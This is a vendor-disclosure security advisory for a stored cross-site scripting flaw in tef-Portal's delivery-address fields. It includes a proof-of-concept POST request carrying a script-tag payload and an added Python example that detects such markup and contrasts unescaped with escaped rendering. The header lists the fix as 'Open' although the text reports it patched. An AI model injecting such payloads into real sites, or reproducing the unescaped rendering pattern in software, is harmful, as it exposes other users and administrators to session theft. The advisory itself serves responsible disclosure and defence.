Advisory ID: SYSS-2023-020
Product: tef-Portal
Manufacturer: tef-Dokumentation GmbH
Affected Version(s): 2023-07-17
Tested Version(s): 2023-07-17
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2023-07-21
Solution Date: 2023-08-08
Public Disclosure: 2023-08-28
CVE Reference: CVE-2023-41107
Authors of Advisory: Sebastian Auwaerter, SySS GmbH
                     Nikolaus Seitzer, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The cloud-based software "tef-Portal" is a web shop system.

The manufacturer describes the product as follows (see [1]):

"With this portal, you are close to your dealers and service partners
around the clock. You can optimize your dealer management with little
effort and improve your partners' loyalty to you as a manufacturer."

Due to missing input validation, the tef-Portal is prone to a persistent
cross-site scripting (PXSS) vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The fields for delivery addresses can be used for PXSS attacks by an
authenticated user with the permission to edit the delivery address.

Other users, including administrators, will execute JavaScript code which
has been injected into those parameters by an attacker as soon as they
navigate to the delivery address.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Create a delivery address containing an XSS attack vector like the one in
the following request in any of the fields:

POST /-portal/modules/Shop/Windows/Lieferadresse.aspx HTTP/1.1
Host: .tef-kat.com
Cookie: ASP.NET_SessionId=
[...]

txtName1=a%3Cscript%3Ealert%281%29%3C%2Fscript%3E
[...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

tef has fixed this vulnerability on its cloud service. Therefore, the
vulnerability does not exist anymore.
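To show the defect and its fix from the defending side, here is an added Python example (not tef's code): it decodes the PoC form body above, flags address fields whose decoded value looks like injected markup, and renders the value once verbatim (the CWE-79 pattern) and once HTML-encoded. The second field name txtName2 and its value are constructed for the example and are not taken from tef-Portal.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed form body modelled on the PoC request in this advisory:
# txtName1 carries the advisory's payload; txtName2 is a harmless
# constructed field (its name is assumed, not taken from tef-Portal).
POC_BODY = (
    "txtName1=a%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
    "&txtName2=Example+GmbH"
)

# Start of an HTML tag, an inline event handler, or a javascript: URL.
# A heuristic for reviewing stored address data or request logs; it can
# produce false positives and is not a substitute for output encoding.
MARKUP_RE = re.compile(r"<\s*/?[a-zA-Z!]|on\w+\s*=|javascript:", re.IGNORECASE)


def decode_form(body: str) -> dict[str, str]:
    """Decode an application/x-www-form-urlencoded body to field -> value."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(value: str) -> str:
    """Reflect the stored value into HTML verbatim: the pattern behind CWE-79."""
    return f"<td>{value}</td>"


def render_hardened(value: str) -> str:
    """Same table cell, with the value HTML-encoded before it is emitted."""
    return f"<td>{html.escape(value, quote=True)}</td>"


def audit_form(body: str) -> list[str]:
    """Names of fields whose decoded value looks like injected markup."""
    return [k for k, v in decode_form(body).items() if MARKUP_RE.search(v)]


if __name__ == "__main__":
    fields = decode_form(POC_BODY)
    print("suspicious fields:", audit_form(POC_BODY))
    print("vulnerable:", render_vulnerable(fields["txtName1"]))
    print("hardened:  ", render_hardened(fields["txtName1"]))
```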
More information can be found at https://tef.de/blog-2/.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-07-17: Vulnerability discovered
2023-07-21: Vulnerability reported to manufacturer
2023-08-08: Patch released by manufacturer
2023-08-28: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for tef-Portal
    https://tef.de/en/software-solutions/tef-portal/
[2] SySS Security Advisory SYSS-2023-020
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-020.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Auwaerter and
Nikolaus Seitzer of SySS GmbH.

E-Mail: sebastian.auwaerter@syss.de
Public Key: https://www.syss.de/kontakt/pgp-keys
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6

E-Mail: nikolaus.seitzer@syss.de
Public Key: https://www.syss.de/kontakt/pgp-keys
Key Fingerprint: 726A 551F 5717 BB28 B45F 9F9E 3242 E1E4 E9EB 1DF1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en